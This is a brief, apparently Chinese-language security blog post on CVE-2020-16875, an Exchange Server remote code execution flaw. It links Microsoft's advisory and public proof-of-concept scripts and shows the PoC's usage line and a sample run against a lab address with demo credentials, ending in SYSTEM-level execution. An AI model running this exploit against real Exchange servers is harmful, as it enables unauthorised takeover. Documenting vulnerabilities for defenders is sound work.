Posted 2020-09-14Updated 2021-03-03Updated 2021-03-03a few seconds read (About 108 words)0 visitsCVE-2020-16875: Exchange Server 远程代码执行漏洞更新公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875 微软公告说的很明显,只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令。 https://srcincite.io/pocs/cve-2020-16875.py.txt https://srcincite.io/pocs/cve-2020-16875.ps1.txt researcher@incite:~$ ./poc.py(+) usage: ./poc.py <target> <user:pass> <cmd>(+) eg: ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaintresearcher@incite:~$ ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint(+) logged in as harrym@exchangedemo.com(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5(+) triggered rce as SYSTEM! CVE-2020-16875: Exchange Server 远程代码执行漏洞http://www.ol4three.com/2020/09/14/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/pwnable.kr/Exploit/CVE-2020-16875-Exchange-Server-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/Authorol4threePosted on2020-09-14Updated on2021-03-03Licensed under Exchange-Server